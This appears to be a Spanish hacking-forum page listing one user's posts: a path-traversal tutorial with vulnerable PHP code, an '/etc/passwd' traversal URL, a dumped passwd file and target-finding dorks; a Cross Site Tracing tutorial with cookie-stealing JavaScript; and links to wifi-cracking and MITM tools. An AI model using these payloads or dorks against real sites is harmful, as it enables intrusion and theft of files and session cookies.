Mostrar Mensajes - Stuxnet

Bienvenido(a), Visitante. Por favor, ingresa o regístrate.

Cargando

Información del Perfil

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Stuxnet

Páginas: [1] 2 3 4 5

1

Defacing / Full Source Disclosure

« en: Mayo 20, 2013, 05:06:54 am »

0×01: Introducción

Full Source Disclosure es una vulnerabilidad que permite descargar cualquier tipo de archivo del servidor/web, permitiendo asi ver el código fuente de la misma web incluyendo la DB. Muchas veces se presenta, Como ejemplo:

http://www.webvulnerable.com/upload/descarga.php?file=documento.doc

0×02: Explotacion de la vulnerabilidad

Primero procedemos a descargar el archivo vulnerable, para ver su funcionamiento, en primera instancia esto es importante para poder determinar los demas archivos hasta llegar a nuestro objetivo clave, la base de datos.

Código: [Seleccionar]

    <?
    require (“../Include/PathWeb.php”);
    $Archivo     = $_GET["Archivo"];
    $PathCompleto    = $DirWeb.”/”.$_GET["Path"].”/”.$Archivo;

    $file_extension = strtolower(substr(strrchr($Archivo,”.”),1));

    switch ($file_extension) {
    case “pdf”: $ctype=”application/pdf”; break;
    case “exe”: $ctype=”application/octet-stream”; break;
    case “zip”: $ctype=”application/zip”; break;
    case “doc”: $ctype=”application/msword”; break;
    case “xls”: $ctype=”application/vnd.ms-excel”; break;
    case “ppt”: $ctype=”application/vnd.ms-powerpoint”; break;
    case “gif”: $ctype=”image/gif”; break;
    case “png”: $ctype=”image/png”; break;
    case “jpe”: case “jpeg”:
    case “jpg”: $ctype=”image/jpg”; break;
    default: $ctype=”application/force-download”;
    }
    if (!file_exists($PathCompleto)) die(“NO EXISTE EL ARCHIVO: $PathCompleto”);

    header(“Pragma: public”);
    header(“Expires: 0″);
    header(“Cache-Control: must-revalidate, post-check=0, pre-check=0″);
    header(“Cache-Control: private”,false);
    header(“Content-Type: $ctype”);
    header(“Content-Disposition: attachment; filename=\”".basename($Archivo).”\”;”);
    header(“Content-Transfer-Encoding: binary”);
    header(“Content-Length: “.@filesize($PathCompleto));
    set_time_limit(0);
    @readfile(“$PathCompleto”) or die(“Archivo no encontrado.”);
    ?>

Como vemos la variable archivo pasa por una mala comprobacion de la misma, por lo tanto podremos bajar y ver el codigo fuente de cualquier archivo que nosotros queramos. Con un poco de ingenio podemos ir buscando por los demas archivos hospedados, vemos que en descargas.php aparece la linea require (“../Include/PathWeb.php”); asi que prodeceremos a descargar ese archivo, buscando un poco encontre un panel de administracion, mire el action del formulario

Si tenemos suerte encontraremos el phpmyadmin y lo demas a imaginacion.

Tambien como dije al principio, pasaria a ser vulnerable el servidor, por lo que si intentamos descargar un archivo de el conociendo su ruta obviamente podremos verlo, como ejemplo tomo el famoso /etc/passwd:

http://www.webvulnerable.com/upload/descarga.php?file=../../../../../../../etc/passwd (el famoso ataque '../'):

Código: [Seleccionar]

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/bin/true
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
admin:x:500:500::/home/admin:/bin/bash
majordomo:x:91:91:Majordomo List Manager:/usr/lib/majordomo:/bin/bash
fpweb:x:501:501::/home/fpweb:/bin/bash
tomcat4:x:100:101:Tomcat4:/var/tomcat4:/bin/bash
clamav:x:101:102:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
vhbackup:x:502:502::/home/vhbackup:/bin/bash
admin174:x:504:504::/home/virtual/site174/fst:/bin/false
admin102:x:509:509::/home/virtual/site102/fst:/bin/false
admin289:x:515:515::/home/virtual/site289/fst:/bin/false
admin177:x:518:518::/home/virtual/site177/fst:/bin/false
admin173:x:519:519::/home/virtual/site173/fst:/bin/false
admin18:x:522:522::/home/virtual/site18/fst:/bin/false
admin270:x:525:525::/home/virtual/site270/fst:/bin/false
admin22:x:538:538::/home/virtual/site22/fst:/bin/false
admin234:x:539:539::/home/virtual/site234/fst:/bin/false
admin21:x:540:540::/home/virtual/site21/fst:/bin/false
admin163:x:541:541::/home/virtual/site163/fst:/bin/false
admin235:x:544:544::/home/virtual/site235/fst:/bin/false
admin19:x:547:547::/home/virtual/site19/fst:/bin/false
admin28:x:548:548::/home/virtual/site28/fst:/bin/false
admin11:x:554:554::/home/virtual/site11/fst:/bin/false
admin233:x:555:555::/home/virtual/site233/fst:/bin/false
admin108:x:556:556::/home/virtual/site108/fst:/bin/false
admin30:x:570:570::/home/virtual/site30/fst:/bin/false
admin1:x:575:575::/home/virtual/site1/fst:/bin/false
admin321:x:578:578::/home/virtual/site321/fst:/bin/false
admin192:x:580:580::/home/virtual/site192/fst:/bin/false
admin320:x:595:595::/home/virtual/site320/fst:/bin/false
admin71:x:602:602::/home/virtual/site71/fst:/bin/false
admin41:x:604:604::/home/virtual/site41/fst:/bin/false
admin37:x:606:606::/home/virtual/site37/fst:/bin/false
admin400:x:610:610::/home/virtual/site400/fst:/bin/false
admin91:x:611:611::/home/virtual/site91/fst:/bin/false
admin90:x:612:612::/home/virtual/site90/fst:/bin/false
admin371:x:613:613::/home/virtual/site371/fst:/bin/false
admin45:x:614:614::/home/virtual/site45/fst:/bin/false
admin47:x:616:616::/home/virtual/site47/fst:/bin/false
admin398:x:617:617::/home/virtual/site398/fst:/bin/false
admin379:x:626:626::/home/virtual/site379/fst:/bin/false
admin5:x:627:627::/home/virtual/site5/fst:/bin/false
admin360:x:630:630::/home/virtual/site360/fst:/bin/false
admin407:x:632:632::/home/virtual/site407/fst:/bin/false
admin92:x:634:634::/home/virtual/site92/fst:/bin/false
admin94:x:635:635::/home/virtual/site94/fst:/bin/false
admin7:x:638:638::/home/virtual/site7/fst:/bin/false
admin374:x:647:647::/home/virtual/site374/fst:/bin/false
admin78:x:656:656::/home/virtual/site78/fst:/bin/false
admin365:x:659:659::/home/virtual/site365/fst:/bin/false
admin399:x:660:660::/home/virtual/site399/fst:/bin/false
admin54:x:662:662::/home/virtual/site54/fst:/bin/false
admin52:x:664:664::/home/virtual/site52/fst:/bin/false
admin88:x:665:665::/home/virtual/site88/fst:/bin/false
admin96:x:666:666::/home/virtual/site96/fst:/bin/false
admin74:x:670:670::/home/virtual/site74/fst:/bin/false
admin58:x:672:672::/home/virtual/site58/fst:/bin/false
admin369:x:678:678::/home/virtual/site369/fst:/bin/false
admin50:x:685:685::/home/virtual/site50/fst:/bin/false
admin87:x:686:686::/home/virtual/site87/fst:/bin/false
admin66:x:689:689::/home/virtual/site66/fst:/bin/false
admin67:x:690:690::/home/virtual/site67/fst:/bin/false
admin35:x:691:691::/home/virtual/site35/fst:/bin/false
admin89:x:692:692::/home/virtual/site89/fst:/bin/false
admin72:x:705:705::/home/virtual/site72/fst:/bin/false
admin341:x:706:706::/home/virtual/site341/fst:/bin/false
admin356:x:707:707::/home/virtual/site356/fst:/bin/false
admin357:x:708:708::/home/virtual/site357/fst:/bin/false
admin355:x:709:709::/home/virtual/site355/fst:/bin/false
admin354:x:711:711::/home/virtual/site354/fst:/bin/false
admin53:x:719:719::/home/virtual/site53/fst:/bin/false
admin105:x:725:725::/home/virtual/site105/fst:/bin/false
admin118:x:728:728::/home/virtual/site118/fst:/bin/false
admin124:x:732:732::/home/virtual/site124/fst:/bin/false
admin126:x:734:734::/home/virtual/site126/fst:/bin/false
admin132:x:741:741::/home/virtual/site132/fst:/bin/false
admin133:x:742:742::/home/virtual/site133/fst:/bin/false
admin134:x:743:743::/home/virtual/site134/fst:/bin/false
admin31:x:746:746::/home/virtual/site31/fst:/bin/false
admin14:x:748:748::/home/virtual/site14/fst:/bin/false
admin138:x:756:756::/home/virtual/site138/fst:/bin/false
admin140:x:758:758::/home/virtual/site140/fst:/bin/false
castellanosbk:x:760:760::/home/castellanosbk:/bin/bash
admin70:x:763:763::/home/virtual/site70/fst:/bin/false
admin142:x:764:764::/home/virtual/site142/fst:/bin/false
admin143:x:765:765::/home/virtual/site143/fst:/bin/false
admin86:x:767:767::/home/virtual/site86/fst:/bin/false
admin155:x:780:780::/home/virtual/site155/fst:/bin/false
admin158:x:783:783::/home/virtual/site158/fst:/bin/false
admin125:x:788:788::/home/virtual/site125/fst:/bin/false
admin170:x:794:794::/home/virtual/site170/fst:/bin/false
admin29:x:801:801::/home/virtual/site29/fst:/bin/false
admin148:x:812:812::/home/virtual/site148/fst:/bin/false
admin82:x:814:814::/home/virtual/site82/fst:/bin/false
admin130:x:815:815::/home/virtual/site130/fst:/bin/false
admin179:x:823:823::/home/virtual/site179/fst:/bin/false
admin75:x:829:829::/home/virtual/site75/fst:/bin/false
admin187:x:832:832::/home/virtual/site187/fst:/bin/false
admin188:x:833:833::/home/virtual/site188/fst:/bin/false
admin131:x:837:837::/home/virtual/site131/fst:/bin/false
admin100:x:839:839::/home/virtual/site100/fst:/bin/false
admin129:x:840:840::/home/virtual/site129/fst:/bin/false
admin65:x:845:845::/home/virtual/site65/fst:/bin/false
admin16:x:846:846::/home/virtual/site16/fst:/bin/false
admin81:x:849:849::/home/virtual/site81/fst:/bin/false
admin10:x:850:850::/home/virtual/site10/fst:/bin/false
admin13:x:851:851::/home/virtual/site13/fst:/bin/false
admin48:x:853:853::/home/virtual/site48/fst:/bin/false
admin59:x:856:856::/home/virtual/site59/fst:/bin/false
admin20:x:857:857::/home/virtual/site20/fst:/bin/false
admin63:x:858:858::/home/virtual/site63/fst:/bin/false
admin110:x:864:864::/home/virtual/site110/fst:/bin/false
admin117:x:867:867::/home/virtual/site117/fst:/bin/false
admin139:x:870:870::/home/virtual/site139/fst:/bin/false
admin144:x:871:871::/home/virtual/site144/fst:/bin/false
admin145:x:872:872::/home/virtual/site145/fst:/bin/false
admin146:x:873:873::/home/virtual/site146/fst:/bin/false
admin153:x:876:876::/home/virtual/site153/fst:/bin/false
admin164:x:882:882::/home/virtual/site164/fst:/bin/false
admin107:x:889:889::/home/virtual/site107/fst:/bin/false
admin127:x:890:890::/home/virtual/site127/fst:/bin/false
admin32:x:893:893::/home/virtual/site32/fst:/bin/false
admin68:x:895:895::/home/virtual/site68/fst:/bin/false
admin85:x:897:897::/home/virtual/site85/fst:/bin/false
admin119:x:898:898::/home/virtual/site119/fst:/bin/false
admin3:x:899:899::/home/virtual/site3/fst:/bin/false
admin111:x:901:901::/home/virtual/site111/fst:/bin/false
admin25:x:906:906::/home/virtual/site25/fst:/bin/false
admin73:x:908:908::/home/virtual/site73/fst:/bin/false
admin9:x:911:911::/home/virtual/site9/fst:/bin/false
admin36:x:919:919::/home/virtual/site36/fst:/bin/false
admin101:x:920:920::/home/virtual/site101/fst:/bin/false
admin56:x:923:923::/home/virtual/site56/fst:/bin/false
admin122:x:929:929::/home/virtual/site122/fst:/bin/false
admin2:x:930:930::/home/virtual/site2/fst:/bin/false
admin44:x:933:933::/home/virtual/site44/fst:/bin/false
admin42:x:934:934::/home/virtual/site42/fst:/bin/false
admin79:x:937:937::/home/virtual/site79/fst:/bin/false
admin80:x:938:938::/home/virtual/site80/fst:/bin/false
admin97:x:939:939::/home/virtual/site97/fst:/bin/false
admin113:x:943:943::/home/virtual/site113/fst:/bin/false
admin128:x:947:947::/home/virtual/site128/fst:/bin/false
admin61:x:949:949::/home/virtual/site61/fst:/bin/false
admin137:x:953:953::/home/virtual/site137/fst:/bin/false
admin141:x:954:954::/home/virtual/site141/fst:/bin/false
admin150:x:957:957::/home/virtual/site150/fst:/bin/false
admin152:x:959:959::/home/virtual/site152/fst:/bin/false
admin154:x:960:960::/home/virtual/site154/fst:/bin/false
admin162:x:962:962::/home/virtual/site162/fst:/bin/false
admin165:x:963:963::/home/virtual/site165/fst:/bin/false
admin15:x:964:964::/home/virtual/site15/fst:/bin/false
admin4:x:965:965::/home/virtual/site4/fst:/bin/false
admin17:x:966:966::/home/virtual/site17/fst:/bin/false
admin6:x:967:967::/home/virtual/site6/fst:/bin/false
admin24:x:968:968::/home/virtual/site24/fst:/bin/false
admin34:x:972:972::/home/virtual/site34/fst:/bin/false
admin83:x:973:973::/home/virtual/site83/fst:/bin/false
admin49:x:974:974::/home/virtual/site49/fst:/bin/false
admin27:x:977:977::/home/virtual/site27/fst:/bin/false
admin23:x:978:978::/home/virtual/site23/fst:/bin/false
admin103:x:980:980::/home/virtual/site103/fst:/bin/false
admin60:x:981:981::/home/virtual/site60/fst:/bin/false
admin93:x:983:983::/home/virtual/site93/fst:/bin/false
admin104:x:984:984::/home/virtual/site104/fst:/bin/false
admin55:x:985:985::/home/virtual/site55/fst:/bin/false
admin33:x:986:986::/home/virtual/site33/fst:/bin/false
admin39:x:987:987::/home/virtual/site39/fst:/bin/false
admin38:x:988:988::/home/virtual/site38/fst:/bin/false
admin8:x:989:989::/home/virtual/site8/fst:/bin/false
admin43:x:990:990::/home/virtual/site43/fst:/bin/false
admin51:x:991:991::/home/virtual/site51/fst:/bin/false
admin57:x:992:992::/home/virtual/site57/fst:/bin/false
admin62:x:993:993::/home/virtual/site62/fst:/bin/false
admin95:x:995:995::/home/virtual/site95/fst:/bin/false
admin26:x:996:996::/home/virtual/site26/fst:/bin/false
admin69:x:997:997::/home/virtual/site69/fst:/bin/false
admin40:x:998:998::/home/virtual/site40/fst:/bin/false
admin99:x:999:999::/home/virtual/site99/fst:/bin/false
admin12:x:1000:1000::/home/virtual/site12/fst:/bin/false
admin46:x:1001:1001::/home/virtual/site46/fst:/bin/false
admin76:x:1002:1002::/home/virtual/site76/fst:/bin/false
admin77:x:1003:1003::/home/virtual/site77/fst:/bin/false
admin84:x:1004:1004::/home/virtual/site84/fst:/bin/false
admin98:x:1005:1005::/home/virtual/site98/fst:/bin/false
admin106:x:1006:1006::/home/virtual/site106/fst:/bin/false

0×03: Dorks mas comunes

inurl:download.php?file=
inurl:download.php?path=
inurl:download.php?song=
inurl:descarga.php?archivo=
inurl:descarga.php?file=
inurl:descarga.php?arc=
inurl:download.php?*=*.doc

2

GNU / Linux / Ubuntu Malware Removal Toolkit

« en: Mayo 18, 2013, 02:57:48 am »

Ubuntu Malware Removal Toolkit está basada en la distribución Ubuntu Linux y puede arrancar en modo LiveCD, sin necesidad de instalación en disco duro. Aunque está basada en Linux, su campo de batalla es preferentemente sistemas operativos Windows, en los que puede eliminar virus y malware de tu equipo e incluso modificaciones maliciosas del registro de Windows.

Podemos encontrar dentro de sus funciones:

Detectar y limpiar malware Windows directamente desde el LiceCD usando las mejores herramientas gratuitas.
Sencillo de utilizar incluso para usuarios noveles.
Integra scripts Nautilus personalizables que facilitan tareas como escaneo o chequeo del hash de ficheros o directorios.
Encontrar información online pudiendo navegar con Firefox desde el LiveCD.
Soporte de los protocolos de red Windows, es decir, Ubuntu MRT puede navegar por las redes Windows, resolver los nombres de red de equipos, montar carpetas compartidas e incluso usar RDP para controlar remotamente servidores Windows.
Se puede crear un pendrive LiveUSB de manera sencilla desde el LiveCD.
Navegar y buscar archivos del registro de Windows, detectar problemas con el timestamp NTFS y mucho más…
Buscar online los hashes de archivos con un sólo clic de ratón (Virustotal.com, Team Cymru MHR y otros servicios).
Analizar el tráfico de red utilizando las herramientas ntop y BotHunter.

http://sourceforge.net/projects/ubuntu-mrt/?source=dlp

3

Manuales y revistas / Violent Python A Cookbook for Hackers, Forensic Analysts, Penetration Testers ..

« en: Mayo 17, 2013, 03:05:27 am »

Joder que largo el titulo XD

Violent Python. A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

Chapter 1: Introduction
Chapter 2: Penetration Testing with Python
Chapter 3: Forensic Investigations with Python
Chapter 4: Network Traffic Analysis with Python
Chapter 5: Wireless Mayhem with Python
Chapter 6: Web Recon With Python
Chapter 7: Antivirus Evasion with Python

Descarga

4

Manuales y revistas / Nmap 6 Network Exploration and Security Auditing Cookbook

« en: Mayo 12, 2013, 07:18:30 am »

Nmap 6: Network Exploration and Security Auditing Cookbook de Paulino Calderón Pale es un excelente y específico libro sobre el uso de Nmap como herramienta indispensable en proyectos de Test de Penetración.

Contenido Temático:

Chapter 1: Nmap Fundamentals

Introduction
Downloading Nmap from the official source code repository
Compiling Nmap from source code
Listing open ports on a remote host
Fingerprinting services of a remote host
Finding live hosts in your network
Scanning using specific port ranges
Running NSE scripts
Scanning using a specified network interface
Comparing scan results with Ndiff
Managing multiple scanning profiles with Zenmap
Detecting NAT with Nping
Monitoring servers remotely with Nmap and Ndiff

Chapter 2: Network Exploration

Introduction
Discovering hosts with TCP SYN ping scans
Discovering hosts with TCP ACK ping scans
Discovering hosts with UDP ping scans
Discovering hosts with ICMP ping scans
Discovering hosts with IP protocol ping scans
Discovering hosts with ARP ping scans
Discovering hosts using broadcast pings
Hiding our traffic with additional random data
Forcing DNS resolution
Excluding hosts from your scans
Scanning IPv6 addresses
Gathering network information with broadcast scripts

Chapter 3: Gathering Additional Host Information

Introduction
Geolocating an IP address
Getting information from WHOIS records
Checking if a host is known for malicious activities
Collecting valid e-mail accounts
Discovering hostnames pointing to the same IP address
Brute forcing DNS records
Fingerprinting the operating system of a host
Discovering UDP services
Listing protocols supported by a remote host
Discovering stateful firewalls by using a TCP ACK scan
Matching services with known security vulnerabilities
Spoofing the origin IP of a port scan

Chapter 4: Auditing Web Servers

Introduction
Listing supported HTTP methods
Checking if an HTTP proxy is open
Discovering interesting files and directories in various web servers
Brute forcing HTTP authentication
Abusing mod_userdir to enumerate user accounts
Testing default credentials in web applications
Brute-force password auditing WordPress installations
Brute-force password auditing Joomla! installations
Detecting web application firewalls
Detecting possible XST vulnerabilities
Detecting Cross Site Scripting vulnerabilities in web applications
Finding SQL injection vulnerabilities in web applications
Detecting web servers vulnerable to slowloris denial of service attacks

Chapter 5: Auditing Databases

Introduction
Listing MySQL databases
Listing MySQL users
Listing MySQL variables
Finding root accounts with empty passwords in MySQL servers
Brute forcing MySQL passwords
Detecting insecure configurations in MySQL servers
Brute forcing Oracle passwords
Brute forcing Oracle SID names
Retrieving MS SQL server information
Brute forcing MS SQL passwords
Dumping the password hashes of an MS SQL server
Running commands through the command shell on MS SQL servers
Finding sysadmin accounts with empty passwords on MS SQL servers
Listing MongoDB databases
Retrieving MongoDB server information
Listing CouchDB databases
Retrieving CouchDB database statistics

Chapter 6: Auditing Mail Servers

Introduction
Discovering valid e-mail accounts using Google Search
Detecting open relays
Brute forcing SMTP passwords
Enumerating users in an SMTP server
Detecting backdoor SMTP servers
Brute forcing IMAP passwords
Retrieving the capabilities of an IMAP mail server
Brute forcing POP3 passwords
Retrieving the capabilities of a POP3 mail server
Detecting vulnerable Exim SMTP servers version 4.70 through 4.75

Chapter 7: Scanning Large Networks

Introduction
Scanning an IP address range
Reading targets from a text file
Scanning random targets
Skipping tests to speed up long scans
Selecting the correct timing template
Adjusting timing parameters
Adjusting performance parameters
Collecting signatures of web servers
Distributing a scan among several clients using Dnmap

Chapter 8: Generating Scan Reports

Introduction
Saving scan results in normal format
Saving scan results in an XML format
Saving scan results to a SQLite database
Saving scan results in a grepable format
Generating a network topology graph with Zenmap
Generating an HTML scan report
Reporting vulnerability checks performed during a scan

Chapter 9: Writing Your Own NSE Scripts

Introduction
Making HTTP requests to identify vulnerable Trendnet webcams
Sending UDP payloads by using NSE sockets
Exploiting a path traversal vulnerability with NSE
Writing a brute force script
Working with the web crawling library
Reporting vulnerabilities correctly in NSE scripts
Writing your own NSE library
Working with NSE threads, condition variables, and mutexes in NSE

Descarga

Web Oficial

http://nmap-cookbook.com

5

Hacking Wireless / Gerix Wifi Cracker

« en: Mayo 11, 2013, 07:49:57 pm »

Basicamente esta herramienta es una extension Visual de las tradicionales “macchanger”, “aircrack-ng”, y otras ademas que presenta un proceso automatizado de todas estas herramientas.

Requisitos:

Citar

aircrack-ng
macchanger
python-qt3

Descarga:

Citar

wget http://stuxnethack.xtrweb.com/wp-content/uploads/2013/05/gerix-wifi-cracker-ng.tar.gz
tar -zxvf gerix-wifi-cracker-ng.tar.gz
cd gerix-wifi-cracker-ng
python gerix.py

6

Bugs y Exploits / OWASP CSRFTester

« en: Abril 25, 2013, 07:59:29 pm »

Cross-Site Request Forgery (CSRF) es un ataque donde la victima es engañada para cargar información desde o enviar información a la aplicación Web para la que se encuentra autenticado actualmente. El problema es que la aplicación Web no tiene forma de verificar la integridad de la solicitud. El proyecto OWASP CSRFTester intenta dar a los desarrolladores la habilidad de probar sus aplicaciones para encontrar fallas de CSRF.

Instrucciones de uso - Ingles
Descarga

<a href="http://www.youtube.com/watch?v=t6QcRoIjpwI" target="_blank">http://www.youtube.com/watch?v=t6QcRoIjpwI</a>

7

Hacking Wireless / [Herramienta] Evil Foca

« en: Abril 09, 2013, 03:02:16 am »

Evil Foca (Alpha Version) es una herramienta para pentester y auditores de seguridad que tiene como fin poner a prueba la seguridad en redes de datos IPv4 / IPv6.

La herramienta es capaz de realizar distintos ataques como:

MITM sobre redes IPv4 con ARP Spoofing y DHCP ACK Injection.
MITM sobre redes IPv6 con Neighbor Advertisement Spoofing, Ataque SLAAC, fake DHCPv6.
DoS (Denegación de Servicio) sobre redes IPv4 con ARP Spoofing.
DoS (Denegación de Servicio) sobre redes IPv6 con SLAAC DoS.
DNS Hijacking.

Automáticamente se encarga de escanear la red e identificar todos los dispositivos y sus respectivas interfaces de red, especificando sus direcciones IPv4 e IPv6 y las direcciones físicas.

Evil Foca está dividida en 4 paneles, a la izquierda el panel encargado de mostrar los equipos encontrados en la red, donde se podrá agregarlos a mano, y filtrar los resultados obtenidos.

El segundo panel, dispuesto en el centro con todos los posibles ataques a realizar con la herramienta, y a su derecha una breve descripción de cada uno de ellos.

Colocado bajo el panel anterior, se muestran los ataques que se están realizando, su configuración y su estado, permitiendo activarlo o desactivarlo.

Por último, el panel inferior donde se imprime un log de los eventos de la Evil Foca.

Fuente y Descarga

8

Noticias Informáticas / Chipre tendrá el primer cajero de Bitcoins del mundo

« en: Abril 03, 2013, 04:58:33 am »

Jeff Berwick, director ejecutivo de TDV Media & Services, ha anunciado recientemente a través de una declaración en una famosa revista dedicada al mundo de las finanzas que el primer cajero del mundo de Bitcoins estará ubicado en Chipre. Para aquellos que no estén al día en el mundillo de Internet, el Bitcoin es una moneda virtual que funciona completamente al márgen de otras monedas nacionales y al márgen de cualquier Bolsa; se trata de una moneda que se usa exclusivamente en Internet y no depende de ninguna entidad de manera que su valor solamente está relacionado con el interés que pongan los usuarios en la divisa. Dado que el Bitcoin recientemente se ha vuelto mucho más conocido, su valor ha alcanzado ya los 32$ por Bitcoin.

Berwick ha aprovechado la ocasión para recordar que “mientras los políticos europeos negocian en Bruselas el destino del dinero de miles de personas de Chipre, el libre mercado ya ha ayudado a los chipriotas a obtener acceso a su dinero a través de otros medios“, haciendo referencia claramente a una de las ventajas del Bitcoin. Y siguiendo con la mención a Chipre, Berwick también ha comentado que “si las personas [de Chipre] hubieran gastado sus ahorros en Bitcoins ahora no solamente tendrían acceso al 100% de su dinero sino que además podrían disfrutar de las ganancias que ha provocado el mercado al alza de esta divisa“.

El proyecto, denominado como “Tu futuro ahora”, tiene también intención de expandirse por otros países como Argentina o Irán.

Fuente: http://www.abc.es/tecnologia/redes/20130327/abci-chirpe-cajeros-bitcoin-201303271811.html

9

Defacing / Cross Site Tracing (XST)

« en: Abril 03, 2013, 02:15:34 am »

Cross Site Tracing - XST es una vulnerabilidad que se deriva de XSS y es generada por el método HTTP TRACE que muestra las cookies que el navegador tiene para el dominio.

El método TRACE se utiliza principalmente para fines de depuración, pero Jeremiah Grossman descubrió en 2003 que se puede llegar a montar un ataque, que es conocido como XST.

El método HTTP TRACE. Este método se utiliza/ba para debugging de los servidores Web y viene activado por defecto en muchos servers. Lo único que hace es repetir toda información enviada por el cliente al server, es algo así como un echo. Un ejemplo del método Trace sería como sigue:

Código: [Seleccionar]

$ nc 192.168.1.1 80 -vvv
TRACE / HTTP/1.1
Host: prueba
User-Agent: prueba
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Dec 2009 17:07:16 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 50
TRACE / HTTP/1.1
Host: prueba
User-Agent: prueba

Como se observa, el servidor responde exactamente lo mismo que le enviamos en el pedido. La parte útil para el ataque, es que si armamos un pedido HTTP TRACE desde el browser a una página en la cual se utilizan cookies, el servidor nos responderá copiando las cookies de regreso. Por ejemplo, podríamos obtener el siguiente comportamiento:

Código: [Seleccionar]

$ nc 192.168.1.1 80 -vvv
TRACE / HTTP/1.1
Host: prueba
Cookie: SID=13klj12jhlkjhdf09kasdn
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Dec 2009 17:15:26 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73
TRACE / HTTP/1.1
Host: prueba
Cookie: SID=13klj12jhlkjhdf09kasdn

Si podemos obtener la cookie enviada por el browser a través de XSS, para qué necesitamos el método TRACE? bueno resulta ser que hay casos en los que no es posible obtener las cookies utilizando Javascript (u otro lenguaje script ejecutado en el browser).

En browsers como IE6 SP1 y posteriores o Firefox 2.0.0.5 y posteriores, existe una opción de seguridad llamada HttpOnly cookies. Cuando un servidor web envía el parámetro HttpOnly dentro de las cookies, el browser no debería permitir que las cookies sean accesibles utilizando scripts como Javascript. Esto es, si la opción HttpOnly está activada, una llamada a document.cookie nos devolverá vacío, aún cuando existan cookies. Utilizando esta propiedad se previene el robo de cookies explotando vulnerabilidades XSS, lo cual es muy bueno.

Aca es donde entra en juego el XST. A través de XST se pueden obtener cookies aún cuando está activada la característica HttpOnly. Si armamos un pedido HTTP TRACE desde el browser, éste incorporará la cookie como parte del header (la cual todavía no podemos acceder). Ahora, cuando el servidor responda al pedido TRACE, éste incluirá la cookie como parte de la respuesta….

Cómo es posible armar un pedido HTTP TRACE utilizando Javascript? distintos browsers tienen distintos métodos. Para ejemplificar, les dejo los métodos usados por los dos browsers más conocidos, IE y Firefox.

Una forma de realizar este trabajo en Internet Explorer es utilizando el control ActiveX XMLHTTP. Un ejemplo de cómo utilizar esto para obtener cookies es el siguiente (tomado del paper CROSS-SITE TRACING (XST) de Jeremiah Grossman):

Código: [Seleccionar]

<script type="”text/javascript”">
<!–
function sendTrace () {
     var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
     xmlHttp.open(“TRACE”, ”http://foo.bar”,false);
     xmlHttp.send();
     xmlDoc=xmlHttp.responseText;
     alert(xmlDoc);
}
//–>
</script>
<input onclick="”sendTrace();”" request="" trace="" type="BUTTON" value="”Send" />

En firefox la función a utilizar es muy similar:

Código: [Seleccionar]

<script type=”text/javascript”>
<!–
function sendTrace()
{
     xhttp=new XMLHttpRequest();
     xhttp.open(“TRACE”, ”http://foo.bar”,false);
     xhttp.send();
     xmlDoc=xhttp.responseXML;
     alert(xmlDoc);
}
//–>
</script>
<INPUT TYPE=BUTTON onclick=”sendTrace();” VALUE=”Send Trace Request”>

El uso de estas funciones tienen una restricción: no permiten al browser conectarse a otro dominio que no sea el de la página que está mostrando. Pero esto igualmente no es problema para realizar el ataque.

Jeremiah Grossman: "Cross Site Tracing (XST)

10

Phreak / Revenssis Penetration Testing Suite

« en: Abril 01, 2013, 06:09:59 am »

Revenssis es un sistema de todos los tipos útiles de herramientas usadas en computadora y seguridad del uso del Web. Las herramientas disponibles en él incluyen: Los exploradores del App del Web, codifican/las herramientas descifran y del Hashing, laboratorio de investigación de la vulnerabilidad, laboratorio de Forensics, más las utilidades del deber-tener (Shell, las operaciones de búsqueda de SSH, de DNS/WHOIS, Traceroute, operaciones de búsqueda del DB portuario del explorador, del Spam, Netstat).

http://revenssis.com/Revenssis.apk

11

Hacking Wireless / Herramienta "Loki".

« en: Marzo 31, 2013, 03:37:30 am »

Loki es una impresionante herramienta de manipulación de redes a nivel de capa 2/3 creada por Daniel Mende, René Graf y Enno Rey, Loki provee una interfaz gráfica de usuario (GUI) para realizar múltiples ataques a protocolos, permitiéndonos manipular protocolos de red para realizar ataques MITM (Man-In-The-Middle) y otras actividades maliciosas. Los protocolos soportados son:

Citar

ARP
HSRP, HSRPv2
RIP
